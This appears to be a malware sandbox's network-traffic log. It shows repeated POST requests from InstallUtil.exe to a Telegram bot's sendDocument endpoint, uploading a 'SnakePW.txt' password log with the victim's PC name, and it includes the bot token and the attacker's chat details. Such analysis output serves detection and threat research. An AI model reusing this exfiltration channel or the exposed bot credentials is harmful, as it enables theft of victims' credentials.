                                                                                    Data Ascii: {"ok":true,"result":{"message_id":111,"from":{"id":7500935106,"is_bot":true,"first_name":"CARNAGE","username":"CARNAGE007_bot"},"chat":{"id":1018401531,"first_name":"Gaddafi","last_name":"Junior","username":"GADDAFI_JR","type":"private"},"date":1736765171


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    12192.168.2.549997149.154.167.2204435148C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    2025-01-13 10:46:12 UTC352OUTPOST /bot7500935106:AAHefL_Tof6QlJbfgUl9eKB1_ggGz2K7LgY/sendDocument?chat_id=1018401531&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                                                                    Content-Type: multipart/form-data; boundary=------------------------8dd354f99f1f5bb
                                                                                    Host: api.telegram.org
                                                                                    Content-Length: 570
                                                                                    Connection: Keep-Alive
                                                                                    2025-01-13 10:46:12 UTC570OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 33 35 34 66 39 39 66 31 66 35 62 62 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 61 6c 66 6f 6e 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 35 34 39 31 36 33 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 31 33 2f 30 31 2f 32 30 32 35 20 2f 20 30 35 3a 34 35 3a 31 36 0d 0a 43 6c 69 65 6e 74 20 49 50 3a
                                                                                    Data Ascii: --------------------------8dd354f99f1f5bbContent-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:549163Date and Time: 13/01/2025 / 05:45:16Client IP:
                                                                                    2025-01-13 10:46:12 UTC388INHTTP/1.1 200 OK
                                                                                    Server: nginx/1.18.0
                                                                                    Date: Mon, 13 Jan 2025 10:46:12 GMT
                                                                                    Content-Type: application/json
                                                                                    Content-Length: 522
                                                                                    Connection: close
                                                                                    Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                    Access-Control-Allow-Origin: *
                                                                                    Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                    Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                    2025-01-13 10:46:12 UTC522INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 31 32 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 35 30 30 39 33 35 31 30 36 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 43 41 52 4e 41 47 45 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 43 41 52 4e 41 47 45 30 30 37 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 30 31 38 34 30 31 35 33 31 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 47 61 64 64 61 66 69 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 4a 75 6e 69 6f 72 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 47 41 44 44 41 46 49 5f 4a 52 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 36 37 36 35 31 37 32
                                                                                    Data Ascii: {"ok":true,"result":{"message_id":112,"from":{"id":7500935106,"is_bot":true,"first_name":"CARNAGE","username":"CARNAGE007_bot"},"chat":{"id":1018401531,"first_name":"Gaddafi","last_name":"Junior","username":"GADDAFI_JR","type":"private"},"date":1736765172


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    13192.168.2.549998149.154.167.2204435148C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    2025-01-13 10:46:13 UTC328OUTPOST /bot7500935106:AAHefL_Tof6QlJbfgUl9eKB1_ggGz2K7LgY/sendDocument?chat_id=1018401531&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                                                                    Content-Type: multipart/form-data; boundary=------------------------8dd355b5c7a4bd2
                                                                                    Host: api.telegram.org
                                                                                    Content-Length: 570
                                                                                    2025-01-13 10:46:13 UTC570OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 33 35 35 62 35 63 37 61 34 62 64 32 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 61 6c 66 6f 6e 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 35 34 39 31 36 33 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 31 33 2f 30 31 2f 32 30 32 35 20 2f 20 30 35 3a 34 35 3a 31 36 0d 0a 43 6c 69 65 6e 74 20 49 50 3a
                                                                                    Data Ascii: --------------------------8dd355b5c7a4bd2Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:549163Date and Time: 13/01/2025 / 05:45:16Client IP:
                                                                                    2025-01-13 10:46:13 UTC388INHTTP/1.1 200 OK
                                                                                    Server: nginx/1.18.0
                                                                                    Date: Mon, 13 Jan 2025 10:46:13 GMT
                                                                                    Content-Type: application/json
                                                                                    Content-Length: 522
                                                                                    Connection: close
                                                                                    Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                    Access-Control-Allow-Origin: *
                                                                                    Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                    Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                    2025-01-13 10:46:13 UTC522INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 31 33 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 35 30 30 39 33 35 31 30 36 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 43 41 52 4e 41 47 45 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 43 41 52 4e 41 47 45 30 30 37 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 30 31 38 34 30 31 35 33 31 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 47 61 64 64 61 66 69 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 4a 75 6e 69 6f 72 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 47 41 44 44 41 46 49 5f 4a 52 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 36 37 36 35 31 37 33
                                                                                    Data Ascii: {"ok":true,"result":{"message_id":113,"from":{"id":7500935106,"is_bot":true,"first_name":"CARNAGE","username":"CARNAGE007_bot"},"chat":{"id":1018401531,"first_name":"Gaddafi","last_name":"Junior","username":"GADDAFI_JR","type":"private"},"date":1736765173


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    14192.168.2.549999149.154.167.2204435148C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    2025-01-13 10:46:13 UTC352OUTPOST /bot7500935106:AAHefL_Tof6QlJbfgUl9eKB1_ggGz2K7LgY/sendDocument?chat_id=1018401531&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                                                                    Content-Type: multipart/form-data; boundary=------------------------8dd3568682e3567
                                                                                    Host: api.telegram.org
                                                                                    Content-Length: 570
                                                                                    Connection: Keep-Alive
                                                                                    2025-01-13 10:46:13 UTC570OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 33 35 36 38 36 38 32 65 33 35 36 37 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 61 6c 66 6f 6e 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 35 34 39 31 36 33 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 31 33 2f 30 31 2f 32 30 32 35 20 2f 20 30 35 3a 34 35 3a 31 36 0d 0a 43 6c 69 65 6e 74 20 49 50 3a
                                                                                    Data Ascii: --------------------------8dd3568682e3567Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:549163Date and Time: 13/01/2025 / 05:45:16Client IP:
                                                                                    2025-01-13 10:46:14 UTC388INHTTP/1.1 200 OK
                                                                                    Server: nginx/1.18.0
                                                                                    Date: Mon, 13 Jan 2025 10:46:14 GMT
                                                                                    Content-Type: application/json
                                                                                    Content-Length: 522
                                                                                    Connection: close
                                                                                    Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                    Access-Control-Allow-Origin: *
                                                                                    Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                    Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                    2025-01-13 10:46:14 UTC522INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 31 34 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 35 30 30 39 33 35 31 30 36 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 43 41 52 4e 41 47 45 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 43 41 52 4e 41 47 45 30 30 37 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 30 31 38 34 30 31 35 33 31 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 47 61 64 64 61 66 69 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 4a 75 6e 69 6f 72 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 47 41 44 44 41 46 49 5f 4a 52 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 36 37 36 35 31 37 34
                                                                                    Data Ascii: {"ok":true,"result":{"message_id":114,"from":{"id":7500935106,"is_bot":true,"first_name":"CARNAGE","username":"CARNAGE007_bot"},"chat":{"id":1018401531,"first_name":"Gaddafi","last_name":"Junior","username":"GADDAFI_JR","type":"private"},"date":1736765174


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    15192.168.2.550000149.154.167.2204435148C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    2025-01-13 10:46:14 UTC328OUTPOST /bot7500935106:AAHefL_Tof6QlJbfgUl9eKB1_ggGz2K7LgY/sendDocument?chat_id=1018401531&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                                                                    Content-Type: multipart/form-data; boundary=------------------------8dd3574202d1378
                                                                                    Host: api.telegram.org
                                                                                    Content-Length: 570
                                                                                    2025-01-13 10:46:14 UTC570OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 33 35 37 34 32 30 32 64 31 33 37 38 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 61 6c 66 6f 6e 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 35 34 39 31 36 33 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 31 33 2f 30 31 2f 32 30 32 35 20 2f 20 30 35 3a 34 35 3a 31 36 0d 0a 43 6c 69 65 6e 74 20 49 50 3a
                                                                                    Data Ascii: --------------------------8dd3574202d1378Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:549163Date and Time: 13/01/2025 / 05:45:16Client IP:
                                                                                    2025-01-13 10:46:15 UTC388INHTTP/1.1 200 OK
                                                                                    Server: nginx/1.18.0
                                                                                    Date: Mon, 13 Jan 2025 10:46:15 GMT
                                                                                    Content-Type: application/json
                                                                                    Content-Length: 522
                                                                                    Connection: close
                                                                                    Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                    Access-Control-Allow-Origin: *
                                                                                    Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                    Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                    2025-01-13 10:46:15 UTC522INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 31 35 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 35 30 30 39 33 35 31 30 36 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 43 41 52 4e 41 47 45 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 43 41 52 4e 41 47 45 30 30 37 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 30 31 38 34 30 31 35 33 31 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 47 61 64 64 61 66 69 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 4a 75 6e 69 6f 72 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 47 41 44 44 41 46 49 5f 4a 52 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 36 37 36 35 31 37 35
                                                                                    Data Ascii: {"ok":true,"result":{"message_id":115,"from":{"id":7500935106,"is_bot":true,"first_name":"CARNAGE","username":"CARNAGE007_bot"},"chat":{"id":1018401531,"first_name":"Gaddafi","last_name":"Junior","username":"GADDAFI_JR","type":"private"},"date":1736765175


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    16192.168.2.550001149.154.167.2204435148C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    2025-01-13 10:46:16 UTC352OUTPOST /bot7500935106:AAHefL_Tof6QlJbfgUl9eKB1_ggGz2K7LgY/sendDocument?chat_id=1018401531&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                                                                    Content-Type: multipart/form-data; boundary=------------------------8dd35826b3213d5
                                                                                    Host: api.telegram.org
                                                                                    Content-Length: 570
                                                                                    Connection: Keep-Alive
                                                                                    2025-01-13 10:46:16 UTC570OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 33 35 38 32 36 62 33 32 31 33 64 35 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 61 6c 66 6f 6e 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 35 34 39 31 36 33 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 31 33 2f 30 31 2f 32 30 32 35 20 2f 20 30 35 3a 34 35 3a 31 36 0d 0a 43 6c 69 65 6e 74 20 49 50 3a
                                                                                    Data Ascii: --------------------------8dd35826b3213d5Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:549163Date and Time: 13/01/2025 / 05:45:16Client IP:
                                                                                    2025-01-13 10:46:16 UTC388INHTTP/1.1 200 OK
                                                                                    Server: nginx/1.18.0
                                                                                    Date: Mon, 13 Jan 2025 10:46:16 GMT
                                                                                    Content-Type: application/json
                                                                                    Content-Length: 522
                                                                                    Connection: close
                                                                                    Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                    Access-Control-Allow-Origin: *
                                                                                    Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                    Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                    2025-01-13 10:46:16 UTC522INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 31 36 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 35 30 30 39 33 35 31 30 36 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 43 41 52 4e 41 47 45 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 43 41 52 4e 41 47 45 30 30 37 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 30 31 38 34 30 31 35 33 31 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 47 61 64 64 61 66 69 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 4a 75 6e 69 6f 72 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 47 41 44 44 41 46 49 5f 4a 52 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 36 37 36 35 31 37 36
                                                                                    Data Ascii: {"ok":true,"result":{"message_id":116,"from":{"id":7500935106,"is_bot":true,"first_name":"CARNAGE","username":"CARNAGE007_bot"},"chat":{"id":1018401531,"first_name":"Gaddafi","last_name":"Junior","username":"GADDAFI_JR","type":"private"},"date":1736765176


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    17192.168.2.550002149.154.167.2204435148C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    2025-01-13 10:46:17 UTC328OUTPOST /bot7500935106:AAHefL_Tof6QlJbfgUl9eKB1_ggGz2K7LgY/sendDocument?chat_id=1018401531&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                                                                    Content-Type: multipart/form-data; boundary=------------------------8dd3590af61b331
                                                                                    Host: api.telegram.org
                                                                                    Content-Length: 570
                                                                                    2025-01-13 10:46:17 UTC570OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 33 35 39 30 61 66 36 31 62 33 33 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 61 6c 66 6f 6e 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 35 34 39 31 36 33 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 31 33 2f 30 31 2f 32 30 32 35 20 2f 20 30 35 3a 34 35 3a 31 36 0d 0a 43 6c 69 65 6e 74 20 49 50 3a
                                                                                    Data Ascii: --------------------------8dd3590af61b331Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:549163Date and Time: 13/01/2025 / 05:45:16Client IP:
                                                                                    2025-01-13 10:46:17 UTC388INHTTP/1.1 200 OK
                                                                                    Server: nginx/1.18.0
                                                                                    Date: Mon, 13 Jan 2025 10:46:17 GMT
                                                                                    Content-Type: application/json
                                                                                    Content-Length: 522
                                                                                    Connection: close
                                                                                    Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                    Access-Control-Allow-Origin: *
                                                                                    Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                    Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                    2025-01-13 10:46:17 UTC522INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 31 37 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 35 30 30 39 33 35 31 30 36 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 43 41 52 4e 41 47 45 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 43 41 52 4e 41 47 45 30 30 37 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 30 31 38 34 30 31 35 33 31 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 47 61 64 64 61 66 69 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 4a 75 6e 69 6f 72 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 47 41 44 44 41 46 49 5f 4a 52 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 36 37 36 35 31 37 37
                                                                                    Data Ascii: {"ok":true,"result":{"message_id":117,"from":{"id":7500935106,"is_bot":true,"first_name":"CARNAGE","username":"CARNAGE007_bot"},"chat":{"id":1018401531,"first_name":"Gaddafi","last_name":"Junior","username":"GADDAFI_JR","type":"private"},"date":1736765177


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    18192.168.2.550003149.154.167.2204435148C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    2025-01-13 10:46:18 UTC352OUTPOST /bot7500935106:AAHefL_Tof6QlJbfgUl9eKB1_ggGz2K7LgY/sendDocument?chat_id=1018401531&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                                                                    Content-Type: multipart/form-data; boundary=------------------------8dd359eed3caaec
                                                                                    Host: api.telegram.org
                                                                                    Content-Length: 570
                                                                                    Connection: Keep-Alive
                                                                                    2025-01-13 10:46:18 UTC570OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 33 35 39 65 65 64 33 63 61 61 65 63 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 61 6c 66 6f 6e 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 35 34 39 31 36 33 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 31 33 2f 30 31 2f 32 30 32 35 20 2f 20 30 35 3a 34 35 3a 31 36 0d 0a 43 6c 69 65 6e 74 20 49 50 3a
                                                                                    Data Ascii: --------------------------8dd359eed3caaecContent-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:549163Date and Time: 13/01/2025 / 05:45:16Client IP:
                                                                                    2025-01-13 10:46:18 UTC388INHTTP/1.1 200 OK
                                                                                    Server: nginx/1.18.0
                                                                                    Date: Mon, 13 Jan 2025 10:46:18 GMT
                                                                                    Content-Type: application/json
                                                                                    Content-Length: 522
                                                                                    Connection: close
                                                                                    Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                    Access-Control-Allow-Origin: *
                                                                                    Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                    Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                    2025-01-13 10:46:18 UTC522INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 31 38 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 35 30 30 39 33 35 31 30 36 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 43 41 52 4e 41 47 45 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 43 41 52 4e 41 47 45 30 30 37 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 30 31 38 34 30 31 35 33 31 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 47 61 64 64 61 66 69 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 4a 75 6e 69 6f 72 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 47 41 44 44 41 46 49 5f 4a 52 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 36 37 36 35 31 37 38
